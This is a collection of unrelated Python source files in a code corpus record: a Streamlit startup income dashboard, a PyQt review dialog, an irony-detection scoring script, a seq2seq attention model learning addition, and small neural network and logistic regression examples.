)\n st.write(top_10_companies[[\"Name\", \"Income in 2021(in CR)\"]])\nwith tab4:\n top_10_companies = df.sort_values(by=\"Income in 2020(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2020(in CR)\"]])\nwith tab5:\n 
top_10_companies = df.sort_values(by=\"Income in 2019(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2019(in CR)\"]])\n\n\ndata = {\n \"Sector\": [\n \"Natural Language Processing\",\n \"Conversational AI\",\n \"Machine Learning\",\n \"Big Data\",\n \"ERP Consulting\",\n \"Data Analytics\",\n \"Artificial Intelligence\",\n \"Custom Software Development\",\n \"Electrive Vehicle\",\n \"Electric Vehicle\",\n ],\n \"Total_Income\": [\n 15.20,\n 353.67,\n 4137.50,\n 4694.70,\n 8089.69,\n 9262.40,\n 13406.17,\n 15240.63,\n 3272020.00,\n 4393879.00,\n ],\n}\n\ndf10 = pd.DataFrame(data)\nst.bar_chart(df10.set_index(\"Sector\"), use_container_width=True)\n\nsales_by_sector = (\n df_selection.groupby(by=[\"Sector\"])[[\"Total_Income\"]]\n .sum()\n .sort_values(by=\"Total_Income\")\n)\n# print(sales_by_sector)\n\n# Create a bar chart with Sector on the y-axis and Total_Income on the x-axis\n\nproduct_sales = px.bar(\n sales_by_sector,\n x=\"Total_Income\",\n y=sales_by_sector.index,\n orientation=\"h\",\n title=\"Sales by sector\",\n color_discrete_sequence=[\"#275BBB\"] * len(sales_by_sector),\n template=\"plotly_white\",\n)\nprint(product_sales)\nproduct_sales.update_layout(plot_bgcolor=\"rgba(0,0,0,0)\", xaxis=(dict(showgrid=False)))\nfig_avg_income_2023 = px.bar(\n sales_by_sector,\n x=\"Total_Income\",\n y=sales_by_sector.index,\n orientation=\"h\",\n title=\"Sales by sector\",\n color_discrete_sequence=[\"#275BBB\"] * len(sales_by_sector),\n template=\"plotly_white\",\n)\nproduct_sales.update_layout(plot_bgcolor=\"rgba(0,0,0,0)\", xaxis=(dict(showgrid=False)))\n# visvalization\ncolumn1, column2, column3 = st.columns(3)\ncolumn1.plotly_chart(product_sales, use_container_width=True)\nst.title(\"TOP 10 STARTUPS\")\ndf5 = pd.DataFrame(\n {\n \"col1\": [\n 28.6139,\n 19.7515,\n 26.8467,\n 15.3173,\n 11.1271,\n 22.9868,\n 27.0238,\n 10.8505,\n 22.2587,\n 31.1471,\n ],\n \"col2\": [\n 77.2090,\n 75.7139,\n 80.9462,\n 75.7139,\n 78.6569,\n 87.8550,\n 74.2179,\n 76.2711,\n 71.1924,\n 75.3412,\n ],\n \"col3\": np.random.randn(10) * 10000,\n \"col4\": np.random.rand(10, 4).tolist(),\n }\n)\n\nst.map(df5, latitude=\"col1\", longitude=\"col2\", size=\"col3\", color=\"col4\")\n\n# gender = st.sidebar.multiselect(\n# \"Select the Gender:\",\n# options=df[\"Gender\"].unique(),\n# default=df[\"Gender\"].unique()\n# )\n# payment = st.sidebar.multiselect(\n# \"Select the Payment\",\n# options=df[\"Payment\"].unique(),\n# default=df[\"Payment\"].unique()\n# )\n# branch = st.sidebar.multiselect(\n# \"Select the Branch\",\n# options=df[\"Branch\"].unique(),\n# default=df[\"Branch\"].unique()\n# )\n\ndf_selection = df.query(\"Location == @location & Sector==@sector \")\n\n# Check if the dataframe is empty:\nif df_selection.empty:\n st.warning(\"No data available based on the current filter settings!\")\n st.stop() # This will halt the app from further execution.\n","repo_name":"Madhyam123/DataHack_2.0_PS-1_WAR_WITH_CODE","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":10712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36994315428","text":"from .ui.uiQuestionReviewDialog import Ui_QuestionReviewDialog\nfrom PyQt5.QtWidgets import QDialog, QHeaderView\nfrom PyQt5.QtCore import QSortFilterProxyModel\n\nclass QuestionReviewDialog(QDialog):\n def __init__(self, model):\n super().__init__()\n\n self.ui = Ui_QuestionReviewDialog()\n self.ui.setupUi(self)\n\n 
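 # Size columns to their contents and hide columns 0-4 so only the
 # remaining question fields stay visible; the resize mode is applied
 # again once the model is attached below.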
self.ui.questions.header().setSectionResizeMode(\n QHeaderView.ResizeToContents)\n self.ui.questions.setModel(model)\n self.ui.questions.selectionModel().selectionChanged.connect(self.select)\n self.ui.questions.hideColumn(0)\n self.ui.questions.hideColumn(1)\n self.ui.questions.hideColumn(2)\n self.ui.questions.hideColumn(3)\n self.ui.questions.hideColumn(4)\n\n self.ui.questions.header().setSectionResizeMode(\n QHeaderView.ResizeToContents)\n\n def select(self, selected, deslected):\n if len(selected.indexes()) > 0:\n row = selected.indexes()[0].row()\n model = self.ui.questions.model()\n testid = model.record(row).value(\"TestID\")\n questionid = model.record(row).value(\"QuestionID\")\n column1 = model.record(row).value(\"Column1\")\n value1 = model.record(row).value(\"Value1\")\n column2 = model.record(row).value(\"Column2\")\n correctanswer = model.record(row).value(\"CorrectAnswer\")\n useranswer = model.record(row).value(\"UserAnswer\")\n\n self.ui.labelQuestion.setText(\n \"Values from column {} that have the value {} in column {}:\"\n \"\".format(column2, value1, column1))\n self.ui.correctAnswer.setPlainText(correctanswer)\n self.ui.userAnswer.setPlainText(useranswer)\n","repo_name":"kazkansouh/pyMemorise","sub_path":"memorise/questionReview.py","file_name":"questionReview.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19918181844","text":"\n\n\"\"\"\ntest_performance.py\nUses the benchmark system for the SemEval-2018 Task 3 on Irony detection in\nEnglish tweets. The system makes use of token unigrams as features and outputs\ncross-validated F1-score. Performance of the model when trained with each\ndifferent training set is logged to a file. 
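Per-group scores are written to output/output_<group>.csv (control_output/ for
the control run), one row of accuracy, precision, recall and F1 per training set.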
Adapted from Gilles Jacobs &\nCynthia Van Hee's example.py.\n\"\"\"\n\nimport codecs\nimport logging\nimport os\n\nimport numpy as np\nfrom nltk.tokenize import TweetTokenizer\n\nfrom sklearn import metrics\nfrom sklearn.datasets import dump_svmlight_file\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import cross_val_predict, cross_val_score\nfrom sklearn.svm import LinearSVC\n\nlogging.basicConfig(level=logging.INFO)\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n\ndef parse_dataset(fp):\n \"\"\"\n Loads the dataset .txt file with label-tweet on each line and parses the dataset.\n :param fp: filepath of dataset\n :return:\n corpus: list of tweet strings of each tweet.\n y: list of labels\n \"\"\"\n y = []\n corpus = []\n with open(fp, 'rt') as data_in:\n for line in data_in:\n if not line.lower().startswith(\"tweet index\"):\n line = line.rstrip()\n label = int(line.split(\"\\t\")[1])\n tweet = line.split(\"\\t\")[2]\n y.append(label)\n corpus.append(tweet)\n\n return corpus, y\n\n\ndef group_predictions(control=False):\n groups = {\n \"emoji\": [],\n \"n-grams\": [],\n \"all\": []\n }\n\n directory = \"predictions\"\n if control:\n del groups[\"emoji\"]\n directory = \"control_predictions\"\n\n for filename in os.listdir(f\"{DIR_PATH}/{directory}/\"):\n split_filename = filename.split(\"_\")\n groups[\"all\"].append(filename)\n\n try:\n element_type = split_filename[3]\n corpus_type = \"_\".join(split_filename[5:-1])\n except:\n continue\n\n if \"emoji\" in element_type:\n groups[\"emoji\"].append(filename)\n else:\n groups[\"n-grams\"].append(filename)\n\n number = element_type.split(\"-\")[0]\n if number in [\"1\", \"2\", \"3\", \"4\"]:\n groups.setdefault(number, [])\n groups[number].append(filename)\n\n if corpus_type:\n groups.setdefault(corpus_type, [])\n groups[corpus_type].append(filename)\n\n return groups\n\n\ndef create_output(groups, control=False):\n training_directory = f\"{DIR_PATH}/../../../datasets/train/\"\n default = [\"predictions_SemEval2018-T3-train-taskA_emoji.txt\",\n \"predictions_SemEval2018-T3-train-taskA_emoji_tokenised.txt\"]\n\n output_directory = \"output\"\n predictions_directory = \"predictions\"\n if control:\n output_directory = \"control_output\"\n predictions_directory = \"control_predictions\"\n\n for key, filenames in groups.items():\n fout = open(f\"{DIR_PATH}/{output_directory}/output_{key}.csv\", \"w+\")\n fout.write(\"Training Set,Accuracy,Precision,Recall,F1\\n\")\n filenames.extend(default)\n\n for filename in set(filenames):\n training_set = filename.replace('predictions_', '')\n _, y = parse_dataset(f\"{training_directory}{training_set}\")\n with open(f\"{DIR_PATH}/{predictions_directory}/{filename}\") as f:\n predictions = [int(prediction) for prediction in f]\n\n # Get performance\n accuracy = metrics.accuracy_score(y, predictions)\n precision = metrics.precision_score(y, predictions, pos_label=1)\n recall = metrics.recall_score(y, predictions, pos_label=1)\n f1_score = metrics.f1_score(y, predictions, pos_label=1)\n\n fout.write(f\"{training_set},{accuracy},{precision},{recall},{f1_score}\\n\")\n\n\nif __name__ == \"__main__\":\n groups = group_predictions()\n 
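 # group_predictions() buckets the prediction files by feature type
 # ("emoji", "n-grams", n-gram order 1-4, corpus variant, plus "all");
 # create_output() then scores each bucket into its own CSV. Passing
 # control=True to both functions scores control_predictions/ instead.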
create_output(groups)","repo_name":"amosbastian/IronyDetection","sub_path":"models/NIHRIO/src/create_output.py","file_name":"create_output.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33523295382","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Seqeunce Model with Attention for Addition Learning\n# \n# - Use seq-to-seq model to learn mathematical addition based on data\n# - This is based on Chapter 7 of [Deep Learning 2用 Python 進行自然語言處理的基礎理論實作](https://www.tenlong.com.tw/products/9789865020675).\n# - This notebook uses two types of Attention layers:\n# - The first type is the default `keras.layers.Attention` (Luong attention) and `keras.layers.AdditiveAttention` (Bahdanau attention). (But these layers have ONLY been implemented in Tensorflow-nightly.\n# - The second type is developed by Thushan.\n# - Bahdanau Attention Layber developed in [Thushan](https://github.com/thushv89/attention_keras)\n# - Thushan Ganegedara's\n# [Attention in Deep Networks with Keras](https://towardsdatascience.com/light-on-math-ml-attention-with-keras-dc8dbc1fad39)\n\n# In[57]:\n\n\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n\n# In[58]:\n\n\nimport os\nos.chdir('/content/drive/My Drive/_MySyncDrive/Repository/python-notes/nlp')\n\n\n# In[59]:\n\n\nget_ipython().run_line_magic('pwd', '')\n\n\n# In[60]:\n\n\nget_ipython().system('pip install tf-nightly')\n\n\n# In[61]:\n\n\nimport tensorflow, keras\nprint(tensorflow.__version__)\nprint(keras.__version__)\n\n\n# ## Functions\n\n# In[62]:\n\n\nimport re\nimport keras\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense, GRU\nfrom tensorflow.keras.layers import AdditiveAttention, Attention\nimport numpy as np\nfrom random import randint\nfrom numpy import array\nfrom numpy import argmax\nfrom numpy import array_equal\nfrom keras import Model\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, GRU, Concatenate\nfrom keras.layers import Attention\nfrom keras.layers import Dense\nfrom keras.layers import TimeDistributed\nfrom keras.layers import RepeatVector\nfrom keras import Input\nfrom attention import AttentionLayer\nfrom keras.utils import to_categorical\n\n\n# Path to the data txt file on disk.\ndef get_data(data_path, train_test = 0.9):\n data_path = '../../../RepositoryData/data/deep-learning-2/addition.txt'\n with open(data_path, 'r', encoding='utf-8') as f:\n lines = f.read().split('\\n')\n\n enc_text=[l.split('_')[0] for l in lines]\n dec_text=[l.split('_')[-1].strip() for l in lines]\n\n dec_text = ['_' + sent + '_' for sent in dec_text]\n \n np.random.seed(123)\n inds = np.arange(len(enc_text))\n np.random.shuffle(inds)\n \n train_size = int(round(len(lines)*train_test))\n train_inds = inds[:train_size]\n test_inds = inds[train_size:]\n tr_enc_text = [enc_text[ti] for ti in train_inds]\n tr_dec_text = [dec_text[ti] for ti in train_inds]\n\n ts_enc_text = [enc_text[ti] for ti in test_inds]\n ts_dec_text = [dec_text[ti] for ti in test_inds]\n \n return tr_enc_text, tr_dec_text, ts_enc_text, ts_dec_text\n\n\n## when the max_len is known, use this func to convert text to seq\ndef sents2sequences(tokenizer, sentences, reverse=False, pad_length=None, padding_type='post'):\n encoded_text = tokenizer.texts_to_sequences(sentences)\n preproc_text = pad_sequences(encoded_text, padding=padding_type, maxlen=pad_length)\n if reverse:\n 
preproc_text = np.flip(preproc_text, axis=1)\n return preproc_text\n\n\n\ndef preprocess_data(enc_tokenizer, dec_tokenizer, enc_text, dec_text):\n enc_seq = enc_tokenizer.texts_to_sequences(tr_enc_text)\n enc_timesteps = np.max([len(l) for l in enc_seq])\n enc_seq = pad_sequences(enc_seq, padding='post', maxlen = enc_timesteps)\n dec_seq = dec_tokenizer.texts_to_sequences(tr_dec_text)\n dec_timesteps = np.max([len(l) for l in dec_seq])\n dec_seq = pad_sequences(dec_seq, padding='post', maxlen = dec_timesteps)\n return enc_seq, dec_seq\n\n\n# In[63]:\n\n\ndef define_nmt(hidden_size, batch_size, enc_timesteps, enc_vsize, dec_timesteps, dec_vsize):\n \"\"\" Defining a NMT model \"\"\"\n\n # Define an input sequence and process it.\n if batch_size:\n encoder_inputs = Input(batch_shape=(batch_size, enc_timesteps, enc_vsize), name='encoder_inputs')\n decoder_inputs = Input(batch_shape=(batch_size, dec_timesteps - 1, dec_vsize), name='decoder_inputs')\n else:\n encoder_inputs = Input(shape=(enc_timesteps, enc_vsize), name='encoder_inputs')\n if fr_timesteps:\n decoder_inputs = Input(shape=(dec_timesteps - 1, dec_vsize), name='decoder_inputs')\n else:\n decoder_inputs = Input(shape=(None, dec_vsize), name='decoder_inputs')\n\n # Encoder GRU\n encoder_gru = GRU(hidden_size, return_sequences=True, return_state=True, name='encoder_gru')\n encoder_out, encoder_state = encoder_gru(encoder_inputs)\n\n # Set up the decoder GRU, using `encoder_states` as initial state.\n decoder_gru = GRU(hidden_size, return_sequences=True, return_state=True, name='decoder_gru')\n decoder_out, decoder_state = decoder_gru(decoder_inputs, initial_state=encoder_state)\n\n # Attention layer\n # attn_layer = AttentionLayer(name='attention_layer')\n attn_layer = AdditiveAttention(name=\"attention_layer\")\n\n ## The input for AdditiveAttention: query, key\n ## It returns a tensor of shape as query\n ## This is different from the AttentionLayer developed by Thushan\n # attn_out, attn_states = attn_layer([encoder_out, decoder_out])\n\n attn_out, attn_states = attn_layer([decoder_out,encoder_out],return_attention_scores=True)\n\n # Concat attention input and decoder GRU output\n decoder_concat_input = Concatenate(axis=-1, name='concat_layer')([decoder_out, attn_out])\n\n # Dense layer\n dense = Dense(dec_vsize, activation='softmax', name='softmax_layer')\n dense_time = TimeDistributed(dense, name='time_distributed_layer')\n decoder_pred = dense_time(decoder_concat_input)\n\n # Full model\n full_model = Model(inputs=[encoder_inputs, decoder_inputs], outputs=decoder_pred)\n full_model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n full_model.summary()\n\n \"\"\" Inference model \"\"\"\n batch_size = 1\n\n \"\"\" Encoder (Inference) model \"\"\"\n encoder_inf_inputs = Input(batch_shape=(batch_size, enc_timesteps, enc_vsize), name='encoder_inf_inputs')\n encoder_inf_out, encoder_inf_state = encoder_gru(encoder_inf_inputs)\n encoder_model = Model(inputs=encoder_inf_inputs, outputs=[encoder_inf_out, encoder_inf_state])\n\n \"\"\" Decoder (Inference) model \"\"\"\n decoder_inf_inputs = Input(batch_shape=(batch_size, 1, dec_vsize), name='decoder_word_inputs')\n encoder_inf_states = Input(batch_shape=(batch_size, enc_timesteps, hidden_size), name='encoder_inf_states')\n decoder_init_state = Input(batch_shape=(batch_size, hidden_size), name='decoder_init')\n\n decoder_inf_out, decoder_inf_state = decoder_gru(decoder_inf_inputs, initial_state=decoder_init_state)\n # attn_inf_out, attn_inf_states = 
attn_layer([encoder_inf_states, decoder_inf_out])\n attn_inf_out, attn_inf_states = attn_layer([decoder_inf_out, encoder_inf_states],return_attention_scores=True)\n\n decoder_inf_concat = Concatenate(axis=-1, name='concat')([decoder_inf_out, attn_inf_out])\n decoder_inf_pred = TimeDistributed(dense)(decoder_inf_concat)\n decoder_model = Model(inputs=[encoder_inf_states, decoder_init_state, decoder_inf_inputs],\n outputs=[decoder_inf_pred, attn_inf_states, decoder_inf_state])\n\n return full_model, encoder_model, decoder_model\n\ndef train(full_model, enc_seq, dec_seq, batch_size, n_epochs=10):\n \"\"\" Training the model \"\"\"\n loss_epoch = []\n accuracy_epoch = []\n for ep in range(n_epochs):\n losses = []\n accuracies = []\n for bi in range(0, enc_seq.shape[0] - batch_size, batch_size):\n\n enc_onehot_seq = to_categorical(\n enc_seq[bi:bi + batch_size, :], num_classes=enc_vsize)\n dec_onehot_seq = to_categorical(\n dec_seq[bi:bi + batch_size, :], num_classes=dec_vsize)\n\n full_model.train_on_batch(\n [enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :])\n\n l,a = full_model.evaluate([enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :],\n batch_size=batch_size, verbose=0)\n\n losses.append(l)\n accuracies.append(a)\n if (ep + 1) % 1 == 0:\n print(\"Loss/Accuracy in epoch {}: {}/{}\".format(ep + 1, np.mean(losses), np.mean(accuracies)))\n loss_epoch.append(np.mean(losses))\n accuracy_epoch.append(np.mean(accuracies))\n return loss_epoch, accuracy_epoch\n\n\ndef infer_nmt(encoder_model, decoder_model, test_enc_seq, enc_vsize, dec_vsize, dec_timesteps):\n \"\"\"\n Infer logic\n :param encoder_model: keras.Model\n :param decoder_model: keras.Model\n :param test_en_seq: sequence of word ids\n :param en_vsize: int\n :param fr_vsize: int\n :return:\n \"\"\"\n\n test_dec_seq = sents2sequences(dec_tokenizer, ['_'], dec_vsize)\n test_enc_onehot_seq = to_categorical(test_enc_seq, num_classes=enc_vsize)\n test_dec_onehot_seq = np.expand_dims(\n to_categorical(test_dec_seq, num_classes=dec_vsize), 1)\n\n enc_outs, enc_last_state = encoder_model.predict(test_enc_onehot_seq)\n dec_state = enc_last_state\n attention_weights = []\n dec_text = ''\n for i in range(dec_timesteps):\n\n dec_out, attention, dec_state = decoder_model.predict(\n [enc_outs, dec_state, test_dec_onehot_seq])\n dec_ind = np.argmax(dec_out, axis=-1)[0, 0]\n\n if dec_ind == 0:\n break\n test_dec_seq = sents2sequences(\n dec_tokenizer, [dec_index2word[dec_ind]], dec_vsize)\n test_dec_onehot_seq = np.expand_dims(\n to_categorical(test_dec_seq, num_classes=dec_vsize), 1)\n\n attention_weights.append((dec_ind, attention))\n dec_text += dec_index2word[dec_ind]\n\n return dec_text, attention_weights\n\n\n# In[64]:\n\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=[\"PingFang HK\"]\ndef plot_attention_weights(encoder_inputs, attention_weights, enc_id2word, dec_id2word, filename=None):\n \"\"\"\n Plots attention weights\n :param encoder_inputs: Sequence of word ids (list/numpy.ndarray)\n :param attention_weights: Sequence of (:)\n :param en_id2word: dict\n :param fr_id2word: dict\n :return:\n \"\"\"\n\n if len(attention_weights) == 0:\n print('Your attention weights was empty. No attention map saved to the disk. 
' +\n '\\nPlease check if the decoder produced a proper translation')\n return\n\n mats = []\n dec_inputs = []\n for dec_ind, attn in attention_weights:\n mats.append(attn.reshape(-1))\n dec_inputs.append(dec_ind)\n attention_mat = np.transpose(np.array(mats))\n\n fig, ax = plt.subplots(figsize=(32, 32))\n ax.imshow(attention_mat)\n\n ax.set_xticks(np.arange(attention_mat.shape[1]))\n ax.set_yticks(np.arange(attention_mat.shape[0]))\n\n ax.set_xticklabels([dec_id2word[inp] if inp != 0 else \"\" for inp in dec_inputs])\n ax.set_yticklabels([enc_id2word[inp] if inp != 0 else \"\" for inp in encoder_inputs.ravel()])\n\n ax.tick_params(labelsize=32)\n ax.tick_params(axis='x', labelrotation=90)\n\n# if not os.path.exists(config.RESULTS_DIR):\n# os.mkdir(config.RESULTS_DIR)\n# if filename is None:\n# plt.savefig( 'attention.png'))\n# else:\n# plt.savefig(os.path.join(config.RESULTS_DIR, '{}'.format(filename)))\n\n\n# ## Main Program\n\n# ### Data Wrangling and Training\n\n# In[65]:\n\n\n#### hyperparameters\nbatch_size = 128\nhidden_size = 256\nn_epochs = 50\n\n### Get data\ntr_enc_text, tr_dec_text, ts_enc_text, ts_dec_text = get_data(data_path='../../../RepositoryData/data/deep-learning-2/addition.txt')\n\n# \"\"\" Defining tokenizers \"\"\"\nenc_tokenizer = keras.preprocessing.text.Tokenizer(oov_token='UNK', char_level=True)\nenc_tokenizer.fit_on_texts(tr_enc_text)\n\ndec_tokenizer = keras.preprocessing.text.Tokenizer(oov_token='UNK', char_level=True)\ndec_tokenizer.fit_on_texts(tr_dec_text)\n\n# ### Getting sequence integer data\nenc_seq, dec_seq = preprocess_data(enc_tokenizer, dec_tokenizer, tr_enc_text, tr_dec_text)\n\n# ### timestesps\nenc_timesteps = enc_seq.shape[1]\ndec_timesteps = dec_seq.shape[1]\n\n# ### vocab size\nenc_vsize = max(enc_tokenizer.index_word.keys()) + 1\ndec_vsize = max(dec_tokenizer.index_word.keys()) + 1\n\n\n\n\n\n\n# In[66]:\n\n\nprint(enc_vsize)\nprint(dec_vsize)\nprint(tr_enc_text[:5])\nprint(tr_dec_text[:5])\n\n\n# In[67]:\n\n\n###\"\"\" Defining the full model \"\"\"\nfull_model, infer_enc_model, infer_dec_model = define_nmt(\n hidden_size=hidden_size,\n batch_size=batch_size,\n enc_timesteps=enc_timesteps,\n dec_timesteps=dec_timesteps,\n enc_vsize=enc_vsize,\n dec_vsize=dec_vsize)\n\n\n# In[68]:\n\n\nfrom keras.utils import plot_model\nplot_model(full_model, show_shapes=True)\n\n\n# In[69]:\n\n\nget_ipython().run_cell_magic('time', '', 'loss, accuracy = train(full_model, enc_seq, dec_seq, batch_size, n_epochs)\\n')\n\n\n# In[70]:\n\n\nplt.style.use('fivethirtyeight')\n\nplt.plot(range(len(loss)), loss, label='loss')\nplt.plot(range(len(accuracy)), accuracy, label='accuracy')\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# ### Model Saving\n\n# In[71]:\n\n\n# full_model.save('../../../RepositoryData/output/seq2seq-attention-addition/full-model.h5')\n# infer_enc_model.save('../../../RepositoryData/output/seq2seq-attention-addition/infer-enc-model.h5')\n# infer_dec_model.save('../../../RepositoryData/output/seq2seq-attention-addition/infer-dec-model.h5')\n\n\n# ### Prediction\n\n# In[ ]:\n\n\nfull_model.load_weights('../../../RepositoryData/output/seq2seq-attention-addition/full-model.h5')\ninfer_enc_model.load_weights('../../../RepositoryData/output/seq2seq-attention-addition/infer-enc-model.h5')\ninfer_dec_model.load_weights('../../../RepositoryData/output/seq2seq-attention-addition/infer-dec-model.h5')\n\n\n# In[72]:\n\n\nplot_model(infer_enc_model,show_shapes=True)\n\n\n# In[73]:\n\n\nplot_model(infer_dec_model, show_shapes=True)\n\n\n# 
In[74]:\n\n\n\"\"\" Index2word \"\"\"\nenc_index2word = dict(\n zip(enc_tokenizer.word_index.values(), enc_tokenizer.word_index.keys()))\ndec_index2word = dict(\n zip(dec_tokenizer.word_index.values(), dec_tokenizer.word_index.keys()))\n\n\n# In[75]:\n\n\ndef translate(infer_enc_model, infer_dec_model, test_enc_text, \n enc_vsize, dec_vsize, enc_timesteps, dec_timesteps,\n enc_tokenizer, dec_tokenizer):\n \"\"\" Inferring with trained model \"\"\"\n test_enc = test_enc_text\n print('Translating: {}'.format(test_enc))\n\n test_enc_seq = sents2sequences(\n enc_tokenizer, [test_enc], pad_length=enc_timesteps)\n\n test_dec, attn_weights = infer_nmt(\n encoder_model=infer_enc_model, decoder_model=infer_dec_model,\n test_enc_seq=test_enc_seq, enc_vsize=enc_vsize, dec_vsize=dec_vsize, dec_timesteps = dec_timesteps)\n print('\\tFrench: {}'.format(test_dec))\n return test_enc_seq, test_dec, attn_weights\n\n\n# In[76]:\n\n\ntest_enc_seq, test_dec, attn_weights=translate(infer_enc_model=infer_enc_model,\n infer_dec_model=infer_dec_model,\n test_enc_text=ts_enc_text[120],\n enc_vsize=enc_vsize,\n dec_vsize=dec_vsize,\n enc_timesteps=enc_timesteps,\n dec_timesteps=dec_timesteps,\n enc_tokenizer=enc_tokenizer,\n dec_tokenizer=dec_tokenizer)\n\n\n\n# In[77]:\n\n\n\"\"\" Attention plotting \"\"\"\nplot_attention_weights(test_enc_seq, attn_weights,\n enc_index2word, dec_index2word)\n\n\n# In[ ]:\n\n\nprint(tr_enc_text[:5])\nprint(tr_dec_text[:5])\n\n\n\n# ## Evaluation on Test Data\n\n# In[78]:\n\n\ndef test(full_model, ts_enc_text, ts_dec_text, enc_tokenizer, dec_tokenizer, batch_size):\n # ### Getting sequence integer data\n ts_enc_seq, ts_dec_seq = preprocess_data(enc_tokenizer, dec_tokenizer, ts_enc_text, ts_dec_text)\n losses = []\n accuracies = []\n for bi in range(0, ts_enc_seq.shape[0] - batch_size, batch_size):\n enc_onehot_seq = to_categorical(\n ts_enc_seq[bi:bi + batch_size, :], num_classes=enc_vsize)\n dec_onehot_seq = to_categorical(\n ts_dec_seq[bi:bi + batch_size, :], num_classes=dec_vsize)\n\n # full_model.train_on_batch(\n # [enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :])\n l,a = full_model.evaluate([enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :],\n batch_size=batch_size, verbose=0)\n losses.append(l)\n accuracies.append(a)\n print('Average Loss:{}'.format(np.mean(losses)))\n print('Average Accuracy:{}'.format(np.mean(accuracies)))\n\ntest(full_model, ts_enc_text = ts_enc_text, ts_dec_text = ts_dec_text, \n enc_tokenizer = enc_tokenizer, dec_tokenizer = dec_tokenizer, batch_size = batch_size)\n\n","repo_name":"alvinntnu/python-notes","sub_path":"_build/jupyter_execute/nlp/seq-to-seq-attention-addition.py","file_name":"seq-to-seq-attention-addition.py","file_ext":"py","file_size_in_byte":16860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"37709239418","text":"import numpy as np\n\nclass Network(object):\n def __init__(self):\n self.inputLayerSize = 2\n self.outputLayerSize = 1\n self.hiddenLayerSize = 3\n\n self.W1 = np.random.rand(self.inputLayerSize, self.hiddenLayerSize)\n self.W2 = np.random.rand(self.hiddenLayerSize, self.outputLayerSize)\n\n def forward(self, x):\n self.z2 = np.dot(x, self.W1)\n self.a2 = self.sigmoid(self.z2)\n self.z3 = np.dot(self.a2, self.W2)\n yHat = self.sigmoid(self.z3)\n return yHat\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z));\n\n\nif __name__ == \"__main__\":\n x = np.array(([3, 5], [5, 1], [10, 2]), dtype=float)\n NN = Network()\n yHat = 
NN.forward(x)\n print(yHat)\n","repo_name":"kamzab95/NeuralNetwork","sub_path":"Neural.py","file_name":"Neural.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26885919379","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.special import expit\nimport process_depracated as process\n\n# np.set_printoptions(threshold=np.inf)\n\n# get data\nX, T = process.process()\nN = len(X)\nD_X = X.shape[1]\nNUM_EMOTIONS = len(process.EMOTIONS)\n\n# multinomial logistic regression\n\n# STEP1: one-hot encode dependant variable\nzeros = np.zeros((N, 1), dtype=int)\nfor i in range(NUM_EMOTIONS):\n T = np.concatenate((T, zeros), axis=1)\nD_T = T.shape[1]\n\nfor row in range(N):\n emotion = T[row, 0]\n T[row, emotion + 1] = 1\n\n# remove emotion column now that it has been encoded\n# the last encoded (Neutral-6) becomes our reference variable\nT = np.delete(T, [0, NUM_EMOTIONS], axis=1)\n\n\ndef sanity_check_one_hot_encoding():\n r = np.random.random_integers(0, N - 1)\n print('Emotion value', get_emotion(r))\n for i in range(len(T[r])):\n if T[r, i] == 1:\n print('Emotion index (should match value):', i)\n print('Emotion name', process.EMOTIONS[get_emotion(r)])\n process.show_image(X[r].tolist())\n\n\ndef get_emotion(row_index):\n row = T[row_index]\n for i in range(T.shape[1]):\n if row[i] == 1:\n return i\n return NUM_EMOTIONS - 1\n\n\nsanity_check_one_hot_encoding()\n\n# STEP2: Create NUM_EMOTIONS -1 logistic regression models\n\n\n# TODO: all of these methods need to be modded to accept one specific column of T\n# so we can have one model per column\n''' T_old = [1\n 0\n 0\n 0\n ...]\n T_new = [1, 0, 0, ...]\n [0, 1, 0, ...]\n [...]\n'''\n\n\ndef classification_rate(T, P):\n return np.mean(T == P)\n\n\ndef calculate_cross_entropy(T, Y):\n E = 0\n for i in range(N):\n if T[i] == 1:\n E -= np.log(Y[i])\n else:\n E -= np.log(1 - Y[i])\n return E\n\n\n# bias term\nones = np.ones((N, 1))\nX = np.concatenate((X, ones), axis=1)\n\nT_index = 0\n\n# random weights\nw = np.random.randn(D_X + 1)\nb = 0\n\nY = expit(X.dot(w) + b)\n\nlearning_rate = 0.000000001\nerrors = []\nfor t in range(10000):\n cost = calculate_cross_entropy(T[:, T_index], Y)\n if (t % 100 == 0):\n print('Cost:', cost)\n errors.append(cost)\n\n w += learning_rate * ((X.T.dot(T[:, T_index] - Y)))\n b -= learning_rate * (Y - T[:, T_index]).sum()\n\n Y = expit(X.dot(w) + b)\n \n\nplt.plot(errors)\nplt.title('Cross-entroy per iteration')\nplt.show()\n\nprint('Final w', w)\nprint('Classification rate', classification_rate(T[T_index], 